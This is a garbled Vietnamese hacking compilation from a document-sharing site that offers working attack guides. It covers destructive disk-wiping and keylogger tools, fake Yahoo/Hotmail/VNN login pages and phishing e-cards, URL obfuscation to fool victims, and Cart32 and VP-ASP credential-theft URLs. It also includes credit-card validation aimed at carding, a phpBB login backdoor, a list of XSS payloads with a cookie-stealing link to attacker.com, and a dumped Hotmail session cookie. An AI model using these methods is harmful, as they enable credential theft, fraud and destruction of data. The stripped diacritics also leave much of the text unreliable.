Professional Documents
Culture Documents
Kythuat Hack
Kythuat Hack
mt bi vit v cvv2
Th Vin Sch
Mask Link
Phn Mm Aiepr
lm cch no kho IE : Download Here
vo internet options
vo tab content
click trn enable v chn nhng site cn kho, hoc c th kho bt k site hay
website no bn khng mun ngi khc xi my ca bn c th vo c ( phn
ny cc bn t tm hiu )
bo ng k thnh cng
*click trn biu tng nh hnh sau xem cc pw v thng tin cho php save trong
my
mn hnh hin th
*cui cng l chc nng coi nhng password c save trong my khi bn click
save khi login
sau khi click vo file setup cc bn chn file server v click Open nh hnh di :
sau khi cu hnh xong cho server ca barok bn click vo Save Server nh hnh
trn, lc bn s nhn c mn hnh chc mng server save thnh cng nh
sau :
+nhng thng tin thm : revelation khng lm vic trn windows XP ( v windows XP
bc 4
Set password cho keylogger ca bn khi b ngi khc xm nhp bng cch check
vo box " Password Protection " sau chn password ca bn.
Crack cho keylogger: cc ban crack vi Username: vicki v Key: LGvFzeX= crack ny
c trong file crack cc bn dowload ban u.Coi hnh.
bc 2
bc 5
cng vic " ph hoi" cc k n gin ch bng 2 click chut vo file hdkp.exe nh
hnh trn l........ cng ca bn s cht ngay trong ln sau khi ng my! ch c
di m thc hnh ngay, tr khi bn mun thay cng mi, cn nu khng, k thut
phc hi cng sau khi dnh con ny cha c vit nam !
gii thch qu trnh lm hng cng:
ngay sau khi click vo file, chng trnh s bt u ph hoi tt c data trn cng
ca bn, mc d cho bn c dng chng trnh gia chng th vn th ! trong ln
sau khi ng my tnh chng trnh s t ng tip tc chy !
chng trnh ny hot ng nh vo thay i nhng thng tin trong file .bat vn rt
quan trng trong windows ! n s ph cc track t cng v bn kh m c th
phc hi li d liu hay lm g vi cng bn c, sau khi chy chng trnh cng
ca bn coi nh l cc st ! khng lm g c ngoi cch vt vo st rc !
ch : chng trnh ny khng lm vic trn nhng cng dng MACS !
Ngoi ra, mnh cn c 1 vi phn mm khc mun...chia s vi cc bn, tnh cht
cng l ph hoi y nh th, hdd v windows , nhng vi mc nh hn
cc bn c th dowload format winkill winkill32
+++++++++++++++++++
anhlanonline@yahoo.com
S Dng Nuke
*Bi vit vi mc ch hc tp. mnh khng khuyn khch cc bn i ph hoi v
hon ton khng chu trch nhim vi bi vit ca mnh.
bc 2
Phn Mm ShowPass
mnh xin gii thiu n cc bn phn mm ShowPass
+h iu hnh p dng: windows 95,98,98se,Me ( khng dng c vi windows
2000 tr ln )
+chc nng: tm li username v password connect vo internet khi l qun hay b
mt ( m save vo my )
+ng dng : khi qun, mt, hoc xi n trm account t my ang ngi
+cch dng: sau khi unzip, click vo file showpass chy chng trnh, sau click
nt "DIALUPs" tm li hay n trm account
+homepage ca phn mm ny http://www.xcoder.com
+++++++++++++++++++
anhlanonline@yahoo.com
anhlanonline@yahoo.com
Stealther
Download
Gii thiu :
Stealther l mt phn mm kt hp vi trnh duyt IE gip bn m bo s "nc danh" khi duyt web
vo download files,Stealther gip bn che giu IP tht ca mnh khi gh thm cc website, chn cc Cookie
nguy him v m bo s bo mt cho thng tin t my tnh ca bn khi cc website "tnh bo".
Stealther bo v mc ti a quyn c nhn ca bn khi lt web, Stealther lun lun t ng cp nht
nhng anonymous proxy v kim tra kh nng "nc danh" ca cc proxy ....
Ni tm li Stealther l mt phn mm tuyt vi i vi nhng ngi mun an ton khi ln mng.
Hn dn s dng :
Ci t :
Sau khi download bn chy file stealther_setup.exe bt u qu trnh ci t:
Sau bn lm theo cc hng dn trong qu trnh ci t sau khi ci t xong bn chn 1 trong 2 la chn.
1 l khi ng li windows, 2 l khi ng sau, tip tc qu trnh.
Nhp vo mc HTTP : Proxy address to use : 127.0.0.1 Port 14000 --> OK th l xong tit mc thit lp
thng s cho IE gi n tit mc thit lp cho Stealther.
Thit lp cho Stealther cng n gin nh thit lp cho IE thi. Show windows m ca s chnh ca
chng trnh, trong ca s chnh bn c 3 la chn trong mc Change Surfing Mode to la chn mode
"nc dnh" theo ti la chn tt nht l la chn th 2 Strealth Mode.
Tip na bn vo menu Proxy-engine --> View/Edit/Check xem proxy list. Bn c th thm, sa, xo,
check proxy s dng.
thm 1 proxy vo list bn vo munu Edit --> Add new proxy entry
Nhp proxy nh hnh trn ri nhn Apply, ban cng c th Add nhiu proxy mt lc vo list bng cch copy
v paste
kim tra proxy bn vo menu Check --> Check All hoc Check Selected.
Mt proxy tt th s c mc Working l yes nu proxy no c kh nng "nc danh" th mc Anonymos l
Yes. Bn c cng nhiu proxy nh vy th cng tt. Khi xong xui nhng bc trn, kim tra xem thnh
qu ca cc qu trnh bn thc hin, bn vo y check xem proxy by gi ca bn th no. Ok. ht!
Chc bn thnh cng!
bc 2:
checkmail ti email m bn va enter ( ca mnh phi check hm mail
alonedrinkwine@msn.com cn cc bn s check hm mail ca cc bn xi ng
k )
click vo link m bravenet va a cho nh hnh di y :
iu quan trng nht trong phn ny l box "website URL" .Ti box ny bn hy
enter a ch m bn mun victim nhn thy sau khi click vo form fakelogin ca cc
bn, trong v d ny mnh chn site riversongs.com -l mt site v ecard :
sau khi click register nh hnh v bn s thy 1 trang tip theo, khng cn lm g c
ngoi click vo continue nh hnh :
sau khi save file ny li di dng .htm, bn view upload chng ln website no
ri th login qua , sau checkmail ti email bn ng k lc u, s thy nh th
ny :
sau cng lm tng t yahoo ri save li di dng .htm nh hnh di, sau
upload ln website ca cc bn ri g victim vo chi ! coi demo ti y
Hack Mail.vnn.vn
u tin vo http://mail.vnn.vn cng view soucre v paste sau th <head> ri save
di dng file .htm :
coi demo ti y
Hack @ttvnonline.com
u tin cng vo website http://ttvnonline.com chn email ri view soucre :
save lai di dng .htm ri lm nh yahoo hoc hotmail, nhng khi click vo th
khng thy ci lgo ca ttvnonline u ! nh hnh di , nu khng c chc chn
victim s ngi ng rt nhiu !
coi demo ti y
okies, nh vy s qua mnh hng dn cc bn ly trm pw email ca 4 webmail
kh thng dng, tng t nh th bn s em i lm vi cc webmail khc m bn
bit!
nu bn lm xong vic upload nhng page .htm c sa i ln host ca bn,
hy click qua page3 coi cch lm 1 thip in t la victim !
sau khi bit lm fake login ca cc webmail v r victim vo "chi" n trm pw
ca h thnh cng ri, th t nhin c mt iu ny sinh ! l chng nh mi ln
Check
http://www.riversongs.net/Flash/you.html
=====================================================
YOURE A WINNER!!
No Scams, No Kidding- Everything Is FREE!!
School Cool Barbie, Coca-Cola Monopoly, Yankees vs. Mets Chess Set,
Simpsons Wall Clock, Clue, Star Wars Monopoly, Cordless Phones,
Weight Watchers Software, Scooby Doo Gifts, Curious George Watches,
and Biker Sunglasses, all yours for FREE!!
Dont miss out on other FREE gifts like, a Bart Simpson Lunch Box,
Batman Comic Books, James Dean glasses, and MORE!!
All gifts are FREE!!
Dont Miss Out, Click Here While Theres Still Time:
http://www.supertaf.com/adt.php?a=7608461
=====================================================
====================================================
NEED A CAR - New or Used?
http://www.supertaf.com/adt.php?a=7608460
Good or Problem Credit - eCarCredit will can get your car and the loan
you deserve. Thousands of people across the country have purchased
cars and received auto loans with eCarCredit's help through our
NATIONWIDE NETWORK of auto dealers & lenders.
Don't have perfect credit? You can get a car loan with our FREE 2
minute application!
Plus our Loan Advisors HELP YOU FIND A CAR that fits your needs
from a local dealer at no extra cost.
Click here for your new car TODAY!
http://www.supertaf.com/adt.php?a=7608460
*Must be over 18, & approved for credit. Not available in TX, AL, AK,
AR,
HI.
Offer subject to change without notice. Copyright 2002 eCarCredit.com
====================================================
---------------------------------------------------------------------You received this email because someone visited our site and wanted to
tell you about it. To answer, simply reply to this message.
Click here if you don't want to be reached through our service:
http://supertaf.com/optout.php?email=admin()anhlan;;us
Report Abuse: http://supertaf.com/index.php?page=abuse
Got a question? http://supertaf.com/index.php?page=faq
Sender's IP address: 203.162.132.168
---------------------------------------------------------------------gi sa thnh th ny (dng notepad hay front page edit link nhn ecard thnh link
dn ti page fakelogin ca cc bn - tu theo victim c email th no m link n
page sn fake ph hp ):
Your friend anh lan found a site that they thought you'd like.
it out:
Check
http://www.riversongs.net/Flash/you.html
=====================================================
YOURE A WINNER!!
No Scams, No Kidding- Everything Is FREE!!
School Cool Barbie, Coca-Cola Monopoly, Yankees vs. Mets Chess Set,
Simpsons Wall Clock, Clue, Star Wars Monopoly, Cordless Phones,
Weight Watchers Software, Scooby Doo Gifts, Curious George Watches,
and Biker Sunglasses, all yours for FREE!!
Dont miss out on other FREE gifts like, a Bart Simpson Lunch Box,
---------------------------------------------------------------------You received this email because someone visited our site and wanted to
tell you about it. To answer, simply reply to this message.
Click here if you don't want to be reached through our service:
http://supertaf.com/optout.php?email=admin()anhlan;;us
Report Abuse: http://supertaf.com/index.php?page=abuse
Got a question? http://supertaf.com/index.php?page=faq
Sender's IP address: 203.162.132.168
---------------------------------------------------------------------sau khi edit nh trn, send email ny n email ca victim, victim khi m mail,
nhn card s thy mn hnh fakelogin v nhp user cng nh password vo
v th l bn ch cn checkmail ly pw send v !
chc cc bn hack vui v
+++++++++++++++++++
anhlanonline@yahoo.com
ngay khi click go! cc bn thy xut hin thng bo save hoc open file mdb ny !
thnh cng ri !
anhlanonline@yahoo.com
cc bn s thy v s site dng VP-ASP shopping ! tuy nhin nhiu site fix, v
cng vic ca cc bn l d tm nhng site cha fix ! cc bn c th chn bt c
trang no trong list site dng phn mm VP-ASP shopping :
nh hnh di y :
mn hnh hi save hay open ! wow! thnh cng ri ! xin chc mng !
double click chut vo file db trn cc bn s thy rt nhiu tab, thng thng nhng
thng tin trong tab oder l nhng thng tin m chng ta cn tm kim ( cc ), click
ln tab view :
sau khi click tab oder cc bn s thy rt nhiu thng tin, nhiu khi c c cc !
+++++++++++++++++++
anhlanonline@yahoo.com
2.5
3.0
3.5a
4.0
: tt c u b li
: hu ht u b li
: b li 1 phn nh
: gn nh khng b li
hoc : http://www.sitename.com/cgi-bin/cart32/sitename-OUTPUT.txt
Ly Admin Passwords : http://www.sitename.com/cgi-bin/cart32.ini
Ly Clients Passwords : http://www.sitename.com/cgibin/cart32.exe/cart32clientlist
Hin Th Cc Th Mc :
http://www.sitename.com/cgi-bin/cart32.exe/error
+++++++++++++++++++
anhlanonline@yahoo.com
hng dn lm mt feedback
khi lm website chc chn ai cng mun lm 1 ci feedback nhng ngi gh
thm website mt thi gian vo email ca h gi nhng kin ng gp n
cho admin ( thay vo ch cn vo feedback send mail )
ok, vic ny rt d v y mnh lm sn cho cc bn 1 feedback bng ting vit
!download n y
sau khi download v view file feedback.php bng notepad v edit email
admin@anhlan.us bng email ca bn :
+++++++++++++++++++
anhlanonline@yahoo.com
www.globalredirect.com
www.flash.to
www.zooming.to
www.emu.vg
www.linkworld.to
www.rename.net
www.url4life.com
www.n2v.net
www.is----ingbrillant.com
www.nethop.com
www.webmask.com
www.heroffice.com
www.crcpl.tsx.org
www.guruguru.to
www.iscool.net
www.dkanet.com
www.r67.com
www.uni.cc
www.fr.fm
www.d.bz
www.e33.de
www.de.vu
www.dd.vu
www.6x.to
www.b4.to
www.b6.to
www.h3.to
www.thx.to
www.rox.to
www.faster.as
www.hop2.de
www.tsx.to
www.tsx.org
www.bootme.to
www.2fbi.de
www.ubb.cc
www.IDz.net
http://zwap.to
Links
Chng ti xin trn trng gii thiu
Type
Prefix
Length
MASTERCARD
51-55
16
VISA
4
13, 16
AMEX
34
37
15
Diners Club/
Carte Blanche
300-305
36
38
14
Discover
6011
16
enRoute
2014
2149
15
JCB
3
16
JCB
2131
1800
15
- tnh tng: (1+0) + 4 + (6) + 4 + (1+6) + 4 + (6) + 4 + (4) + 9 + (0) + 0 + (2) + 0 + (6) +
3 = 60
- ly tng tnh c mod cho 10, nu s d bng 0 ngha l ng, nu khc 0 ngha l sai.
60 mod 10 = 0 - Luhn Check Digit: passed.
Bc 3: kim tra checksum
- ln lut ly cc ch s v tr l nhn cho 2 ngoi tr ch s cui cng
5 4 3 4 8 4 3 4 2 9 0 0 1 0 3
x2 x2 x2 x2 x2 x2 x2 x2
--------------------------------------10
6 16
6
4
0
2
6
- tnh tng(*): (1+0) + 4 + (6) + 4 + (1+6) + 4 + (6) + 4 + (4) + 9 + (0) + 0 + (2) + 0 + (6)
= 57
- tnh tng cc ch s ca tng(*)
5 + 7 = 12
- ly kt qu trn nhn cho 10 ri tr cho tng(*), sau mod 10, nu s d bng ch s
cui cng ca card number ngha l ng, nu khc ngha l sai.
(12 x 10 - 57) % 10 = 3 - Checksum: passed.
5434-8434-2900-1033 - y l s card hp l
V d 2 : 4128-674-342-188 - hp l
- prefix = 4, length = 13 - Valid Visa CV - Citibank
- 4221661446441168 = 60, (60 mod 10) = 0
- 814837838228 = 62, 6 + 2 = 8, (8 x 10 - 62) % 10 = 8
Tuy nhin bn ch c th kim tra xem s card ng hay sai thi. s dng card, bn
cn bit thm thng tin khc v card nh ngi s hu card, a ch v s phone ca anh
ta, ...
Cng c h tr: (http://www.elfqrin.com/DisCard.html)
Verify a Credit Card Number
Credit Card #
Separator:
BI HC #2
NVH (c)
Xm nhp PC khc khi ang Online :
Thng thng mt hacker trc khi xm nhp my tnh, thng c gng ci mt Trojan
m cng xm nhp, ni ting nht l Trojan Back orffice.
Bi hc ny s ch cho bn lm th no c th kt ni vi mt my tnh ci Windows
thng qua Internet v c th ly thng tin ca chng.
Cng c cn thit :
u tin l bn cn l mt chng trnh scan gi l Netbios scaner. Ti
dng Legion hoc Winhackgold ( Download http://www.hackerclub.com
). Chng trnh s scan tt c cc my c m chia s file trn cng mt
netbios.
Bt u :
Sau khi kt ni vo mng, bn vo Start/Run ri nh winipcfg, bn s
nhn c mt a ch IP m ISP gn cho bn mi khi bn kt ni, nu bn
kt ni bng Modem th s IP ny s thay i gi l IP ng.
Trong mc SCAN FROM ca Legion bn hy nh a ch IP ca mnh
vo. V d ti c 203.160.11.48 th ti nh trong Legion on l 203.160.11
thi. By gi mc TO ca Legion bn nh 203.160.xx (xx l a ch IP
bt k bn nh vo, bn nn nh s gn nht vi IP ca mnh, ti chn s
12).
By gi n nt SCAN, Legion s bt u scan v cho tt c cc a ch IP
n tm thy 1 - 254. Nu bn may mn th khi chn mt a ch IP th bn
s nhn thy nh sau :
Shared resources at \\206.11.11.42
Sharename Type
Comment
---------------------------------------------A
Disk
Floppy
CDRIVE
Disk
C:\ Drive
DDRIVE
Disk
D:\ Drive
CDROM
Disk
CD-Rom Read
Only
The command was completed
successfully.
//
$dbms = "mysql4";
$dbhost = "localhost";
$dbname = "DB name here";
$dbuser = "DB user here";
$dbpasswd = "DB passwd here";
$table_prefix = "phpbb_";
define('PHPBB_INSTALLED', true);
?>
## config.php source end
5.2.2 Upload config.php
Bn upload ln file config.php trong ci forum mi toanh m bn va upload.
http://root/mysite/config.php
5.2.3 Th li
Bn th g http://root/mysite/ xem, nu m forum ca bn c cc thng s y ht nh ca
http://root/victim/phpBB_path tc l bn thnh cng bc ny
Bc 6. Sa m ngun Mirror Site
Mc ch bc ny l bn s sa m ngun forum ca bn bn c th Login vo c Admin
panel ca n. Nu bn hc PHP th vic ny kh d dng.
Ti xin nu ra 1 phng php, l cch crack c in.
6.1 Crack c in
6.1.1
l khi bn mun crack passwd 1 file exe, bn c th deassebler n ra thnh file.asm bng
nhiu chng trnh hin nay
6.1.2
Tm cc lnh nhy c iu kin (JP g g . Ci ny c hng ng m). ca on code di mt
khu
6.1.3
Sa thnh lnh nhy khng iu kin
6.1.4
Compile li thnh file exe v OK. Ta nhp bt c mt khu no vo n cng chp nhn
6.2 Sa m ngun
Sa file login.php v s cho php bn Login di mi nickname bng 1 passwd chn sn
6.2.1 Chn mt khu chung cho ton b cc nick.
Thc s cc mt khu trong phpBB c m ho theo kiu MD5, do c th rt kh khn
c th gii m n. Nu cc bn hiu r v kiu encode ny th cc bn c th t tm cho mnh
mt khu thch hp, nu khng cc bn c th s dng mt khu c ti gii m l:
"hainam@hainam.org"
Ci a ch mail ca ti y m, khi mt khu ny c m ho theo MD5 n s l mt mt khu
nh sau "692e2c95b693cf6fbec8ea5c40536b9e"
hainam@hainam.org => 692e2c95b693cf6fbec8ea5c40536b9e
6.2.2 Thit lp mt khu chung cho ton b cc nick
Trc ht bn m file login.php ra tm on sau :
## file login.php ..
define("IN_LOGIN", true);
define('IN_PHPBB', true);
$phpbb_root_path = './';
include($phpbb_root_path . 'extension.inc');
include($phpbb_root_path . 'common.'.$phpEx);
## file login.php ..
Chn thm bin $hack = "692e2c95b693cf6fbec8ea5c40536b9e";
Tc l sa oanj m thnh
## file login.php ..
define("IN_LOGIN", true);
define('IN_PHPBB', true);
$phpbb_root_path = './';
include($phpbb_root_path . 'extension.inc');
include($phpbb_root_path . 'common.'.$phpEx);
$hack = "692e2c95b693cf6fbec8ea5c40536b9e";
## file login.php ..
Tip tm on m sau
## file login.php ..
else
{
if( md5($password) == $row['user_password'] && $row['user_active'] )
{
$autologin = ( isset($HTTP_POST_VARS['autologin']) ) ? TRUE : 0;
## file login.php ..
Sa on m thnh
## file login.php ..
else
{
if( md5($password) == $hack && $row['user_active'] )
{
$autologin = ( isset($HTTP_POST_VARS['autologin']) ) ? TRUE : 0;
## file login.php ..
Ghi li file login.php
Bc 7.Login User vi mt khu chn
By gi bn c th login vo din n qua website ca bn http://root/mysite/login.php vi bt c
nickname no bng mt khu m bn chn. y l "hainam@hainam.org" k c l nick
Admin, v vo c Admin Panel ..
Ch rng website ca bn th User ch c th login vi mt khu l hainam@hainam.org ch
khng th bng bt k mt khu khc k c l mt khu ng
Tng qut :
I/Phng Php
-y l mt v d cho vic hack cc website khi trong mt local, khng ch ring i vi phpBB
m c th p dng c cho nhiu Portal hay forum khc, tuy nhin c th hack c tng
loi bn u phi hiu rt k v n v trnh lm dng qu ng.
-Cch hack ny tuy mt nhiu thi gian trong vic upload mt mirror nhng rt hiu qu. Tuy
nhin tuyt i khng nn s dng chng lung tung v ba bi.
-Cc hosting cho php free, iu chng t h rt tt bng, cng chnh v vy cng khng nn
s dng phng php ny khi KHNG THC S cn thit
II/V d.
-Trc ht ti xin li nhng ai lm website **** v ti s a website ca cc bn ra lm v d
v l victim u tin ca ti.
-Mong cc bn, nhng ngi ang mun hc hi thm mt cht kinh nghim ch tham qua ch
khng lm dng gi lm hng DataBase ca h, thc s ti backup nhng ti cng rt ngi
restore li. Hn na m bo cho cc bi vit tip theo khng b phn i, ti mong mi ngi
hy tn trng kin ca ti, KHNG PH PHCH G DB CA VICTIM v mang mc ch hc
hi v tham kho ln hang u.
-Website mirror ca website**** l **** , ti y cc bn c th login vo bt c nickname no
trong din n **** vi mt khu chung l "hainam@hainam.org" . hy nh l KHNG NN PH
DB CA H, chi nn tham kho
III/Kinh nghim
iu quan trng khng phi l chng ta hack c nhng ci g m l chng ta hc c nhng
ci g. Qua bi vit ny mong cc bn nm r c mt s thao tc sau
-c m ngun ca mt file bt k trn website khi cng mt server (Bc 3)
-Kinh nghim v mt khu, d tm v ghi nh (Bc 4)
-Cch to mt mirror website hay l cch link DB cho nhiu website (Bc 5)
-Cch crack c in bng ASM (Bc 6.1)
Cc bn nn tm ra cc mi lin h gia cc Portal, Forum, Guest Book, Chatroom PHP-CGI,..
c th p dng phng php ny. Mt khc cc bn cng c th hack c ngay c i vi
cc domain hosting ch khng phi l cc site c dng http://root/yoursite/ . V Cc Paid hosting
cng khng ngai tr kh nng b hack nu cc hacker thc s mun hack v sn sang b
tin mua mt hosting trn cng mt Server. Phn hack paid hosting v domain ti xin cho cc
bn t tm hiu. Hy nh rng lun lun phi ch n URL Root ca mi hosting. V d nh
Cpanel th URL Root cho cc domain hosting l? http://[ip/ Server]/~user .vv
Chc cc bn thnh cng
Bi vit ca Lukos
Ngy nay! cc l hng Cross Site Scripting (XSS) ngy cng c pht hin nhiu cc dch v
i chng ni ting nh: Yahoo, Hotmail, Ebay...
Cng ng cc Hacker v Security chng minh v c nhiu cuc trnh din v v s nguy
him ca XSS bn trong cc dch v i chng ni ting nh: Yahoo, Hotmail, Ebay v mt s
sn phm c a chung nh: Apache, Tomcat, IIS, Lotus Domino. Cc l hng XSS ny cho
php cc Hacker c th d dng nh cp User ca ngi dng trn cc ng dng Web.
Nhng thc hin c mt cuc tn cng XSS th i hi cc Hacker phi c mt kh nng
nht nh. u tin cc Hacker s c gng nh cp Cookies ca ngi s dng vo ng thi
im m ngi s dng ng nhp n cc dch v ng dng Web.
Gn nh tt c cc dch v Web i chng u s dng Cookies lin kt cc ti khon vi
ngi s dng. in hnh l cc dch v Webmail nh: Yahoo, Hotmail, Netscape...V c cc
dch v ngn hng, thng mi in t cng s dng Cookies cho mc ch chng thc v cp
php.
Trong mt kch bn ng nhp vo ca cc ng dng Web. C 2 Token chng thc c yu
cu trao i. N chnh l Username v Password...2 gi tr ny c lu gi bn trong Cookies,
sau c s dng nh mt du hiu chng thc duy nht. Vy nh cp c User v
Password cuat nn nhn. Th trc ht bn phi nh cp c Cookies ca h. Cc Hacker
thng s dng v khai thc tnh d tn thng XSS n cp Cookies ca ngi dng trn
Internet.
Cc Hacker cng c th gin tip s dng cc k thut khc thc hin cng vic ny: chng
hn nh t Cahe DNS, cc Bug t trnh duyt Internet ca bn, hay s dng mt Trojan. Mt khi
cc Cookies c b nh cp. Cc Hacker c th khai thc cc thng tin qu gi lu trn
Cookies v bt u hng cc hot ng n cc Server Web Application. Bt u tn cng n
ti khon ca nn nhn. Nu thhh cng cc Hacker c th ton quyn s dng v iu khin
cc ti khon ng dng trn Web ca bn.
<img src="mocha:[code]">
<img src="livescript:[code]">
<a href="about :<script>[code]</script>">
<meta http-equiv="refresh" content="0;url=java script:[code]">
<body onload="[code]">
<div style="background-image: url(java script:[code]);">
<div style="behaviour: url([link to code]);">
<div style="binding: url([link to code]);">
<div style="width: expression([code]);">
<style type="text/javascript">[code]</style>
<object classid="clsid:..." codebase="java script:[code]">
<style><!--</style><script>[code]//--></script>
<![CDATA[<!--]]><script>[code]//--></script>
<!-- -- --><script>[code]</script><!-- -- -->
<<script>[code]</script>
<img src="blah"onmouseover="[code]">
<img src="blah>" onmouseover="[code]">
<xml src="java script:[code]">
<xml id="X"><a><b><script>[code]</script>;</b></a></xml>
<div datafld="b" dataformatas="html" datasrc="#X"></div>
[\xC0][\xBC]script>[code][\xC0][\xBC]/script>
Bn c th tham kho thm thng tin :
http://www.cgisecurity.com/articles/xss-faq.shtml
http://www.w3.org/DOM/
A Tradition XSS Power Hjack
thc hin mt phin nh cp (Hjack) cc Hacker thng s dng b chp gi tin (Sniffer),
cc cng c b kho (Brute Force)...Thng dng v ph hp hn c vn l cch nh cp
Cookies nm quyn iu khin mt phin ng dng mng ca mt ngi dng hp php
trong khi ngi dng ng nhp vo h thng mng ng dng. Thng thng th k tn cng
thng thc hin tt c cc chc nng ng dng ca mng vi cng c quyn ca ngi s
dng hp php . Di y l cc bc c Hacker s dng nh cp Cookies ca ngi
s dng hp php
- Mt ngi s dng ng nhp vo h thng ng dng Web ca h, mt phin lm vic
c thit lp. Cc Hacker bit v tnh d tn thng ca h thng ng dng Web .
- Hacker s gi cc m XSS him c n nn nhn thng qua E-mail di nh dng HTML hay
qua mt trang Web trung gian. Trong mt vi trng hp cc Hacker c th nhng chng vo
cc ni dung Web ph bin nh Guest Book, Form Mail...cc m him c ny s c t ng
thc thi trn trnh duyt ca nn nhn m khng cn s cho php ca h. Ly v d: tnh d tn
thng trong http://hotwried.lycos.com C on Code sau:
<html>
<head>
<title>Look at this!</title>
</head>
<body>
<a
href="http://hotwired.lycos.com/webmonkey/00/18/index3a_page2.html?tw=<
script>document.location.replace('http://attacker.com/steal.cgi?'+docum
ent.cookie);</script>"> Check this CNN story out! </a>
</body>
</html>
5U4%21l1KIOsuBpTEbUKYkmTuzP
JVj%2abtLeMyiVGap9BF82YvrP2WPsX4Z6ekH9a7cRqq2VqTsp
QIS33GWygbPEsLOEFIupoiaYZdq
mURMJK%21nh6O4u4UNAJUjzOmQ8ye%2at3GjQfi6pBa3vTT533
tCRmZDy47NZY6cPdkbeHR5soAVn
NPyqhvm73a%214%2aFRHPJfOGhT6cbVR9zN%21XDX3seXv9czj
X6cm2lugTnpKZS2UQ0j%21%21PW
kyiqS2aSw%2aKk2%2aCquxzpjE2F0uVZgHfznNjVLPgGV2H%2a
5GqZjXf144U0m8HFwlGS9A8RIwN
MGtMoSro%2atCU6L6304VyZyJ4vlEM%21adk%24;%20MC1=V=3
&GUID=0724b14826c9437ct786b
a6f2a36b04f;%20lang=en_s;%20mh=MSFT;%20SITESERVER=
ID=UID=0724b14876c9437ca786
ba6f2a36b44f;%20MSPAuth=2JqD6vvUbDzqFAm6O7QVMWaeSd
tiJExWGRQ5cmSuJ9CUf4QSJbsQN
mKkOCe3RLo%21A5GhxQ7mtfdZ%2aw3Bc0O7Pwzw%24%24;%20M
SPProf=2JqD6vvUbB11hog4j6Og
bT%21BYwgn3IZN9AyKYUpDNECCi%2a9dBZf37wqxmWtyS%21%1
Z6icYG8dVF30FnbsANQcdN1lQ%
21QJCTDiddJAW9oiWSf%2a8g9nwIGclDtNP6Hk2gFlOfZHEjuv
kM6Ja1N549eYs1VuhdcHCFWukzb
VR%21%218POKn%2aS8vcqVg4ZHHgabh0CQXoxj;%20domain=l
w4fd.law4.hotmail.msn.com;
###################################################
####################
Author by : CUCCU ( Members of HVA )
Website : http:// www.vnhacker.org/forum/
Edit by
: PTV5 Group
Website : http://www.ptv5online.com ; http://www.ptv5online.net
###################################################
####################
Li m u:
Trc tin xin ni trc l bi vit ny l ca ti t nghin cu v vit, bt c bi vit
no post li m khng ghi tn ti l tui "ca ci lng" cho tt lun y
z ---> %7A
Z ---> %5A
1 ---> %31 2 ---> %32 3 ---> %33 4 ---> %34 5 ---> %35
6 ---> %36 7 ---> %37 8 ---> %38 9 ---> %39 0 ---> %30
. ---> %2E
Okie, c ri , lu nh sau: ng link no d long ngong n u th cng
vn c cc ch v con s, do bn khng nn m ho tt c, m ch m ho 1 s
t nhy cm, v d www11.brinkster.com chng hn, victim khng nhn ra l
brinkster, bn m ho mt s t thi:
w%77w1%31.br%69ks%74er%2Ecom
hehhe, hp l ch.......
Thnh cng nhe.....
**********************************************************
Bi vit ca Cuccu__
**********************************************************
Ch :
Nu cc bn dng host www.mircd.com, v dng cch m ho Url, cn ch :
* M ho Url thng thng chp nhn tt c cc trang Web, nhng nu bn Save as
trang login ca Yahoo, th n s khng c cc file nh, lc fake login ca bn s
thng l ch nu up ln host m ng link ca bn c m ho (th m xem)
Cch khc phc: sa ng dn ca cc file nh
Khi bn save as, thng l n s save thnh file: Yahoo! Mail - the best.......htm v 1
th mc cha cc file nh v *.js c tn l Yahoo! Mail - the best......_files.
Chnh ci tn long ngong ny khin cho cc file nh nm trong n load rt chm v
nhiu khi khng load c, gy ra hin tng li....., nu bn dng www.mircd.com
th n ch cho upload file, khng cho to th mc mi....
u tin, bn nn sa ci file Yahoo! Mail..... thnh tn ngn gn thi, cng ngn
cng tt (nu bn dng www.mircd.com th nn i thnh index.html)
Dng trnh notepad, m file ra, n t hp phm : ctrl + H ( thay th 1 cm t
thnh 1 cm t khc)
box Find What: in vo l
Yahoo! Mail - The best free web-based email!_files/
box Replace With: trng
Sau bn click vo Replace All thay th
Save file index.html va sa i li, copy tt c cc file trong th mc Yahoo! Mail The best free web-based email!_files v file index.html vo cng 1 th mc khc,
sau upload ln host.....
Okie, lc ny th bn m ho Url thoi mi ri ......
Bc 3: Nghi binh
Theo ti, nu ch c trang fake login th cha gt victim, nht l khi cn nh
trng i tng cn ly pass (nh pass ca ngi yu chng hn ), do cn mt
vi th thut nho nh victim khng nghi ng.......
1) Gi mo Mail Box ca Victim:
Mt Mail Box c m ra m qun khng Sign Out, thng khi truy cp li, Yahoo!
Mail s t ng login li Mail Box va m, do , cch nghi binh u tin l to mt
mail box y ht ca victim, trong tt c cc nt, ng link b thay i n cc
trang gi mo ca mnh.
Cc "cng c" cn c trc tin:
* Bn vo MailBox ca chnh bn, save as n, sau khng cn lm g na, bn ch
cn cc file trong th mc "Yahoo! Mail - Tn bn@yahoo.com_files"
* trang Re_login ca Yahoo! Mail (c khi ta m 2 Mail Box khc nhau)
* trang Return Yahoo! Mail (c c khi ta Sign Out)
<font color="#FF0000">(trong dong` Wellcome...., vi' du. hop thu cua toi la`
Wellcom, Phan)</font></p>
<script>
function gene()
{
r=Math.floor(Math.random()*100000)
K='"'
F="S"
clrar.value+="<!DOCTYPE HTML PUBLIC "+K+"-//W3C//DTD HTML 4.0
Transitional//EN"+K+">\n"
clrar.value+="<!-- saved from
url=(0058)http://us.f137.mail.yahoo.com/ym/login?.rand=84b8k66avhn5g -->\n"
clrar.value+="<!--web13705--><HTML><HEAD><TITLE>Yahoo! Mail "+b1.value+"@yahoo.com</TITLE>\n"
clrar.value+="<META http-equiv=Content-Type content="+K+"text/html;
charset=windows-1252"+K+">\n"
clrar.value+="<script>\n"
clrar.value+="<!-- \n"
clrar.value+="if (typeof top.frames["+K+"wmailmain"+K+"] !=
"+K+"undefined"+K+") {\n"
clrar.value+=" window.open("+K+"http://mail.yahoo.com"+K+",
"+K+"_top"+K+");\n"
clrar.value+="}\n"
clrar.value+="var ypim_color = "+K+"blue"+K+";\n"
clrar.value+="// -->\n"
clrar.value+="</"+F+"CRIPT>\n\n"
clrar.value+="<script src="+K+"ylib_dom.js"+K+"></"+F+"CRIPT>\n\n"
clrar.value+="<script language=JavaScript \n"
clrar.value+="src="+K+"pim.js"+K+"></"+F+"CRIPT>\n\n"
clrar.value+="<script language=JavaScript\n"
clrar.value+="src="+K+"pim_css.js"+K+"></"+F+"CRIPT>\n"
clrar.value+="<NOSCRIPT>\n"
clrar.value+="<META http-equiv=Refresh content="+K+"0; URL=/ym/login?
nojs=1"+K+"></NOSCRIPT>\n"
clrar.value+="<script>\n"
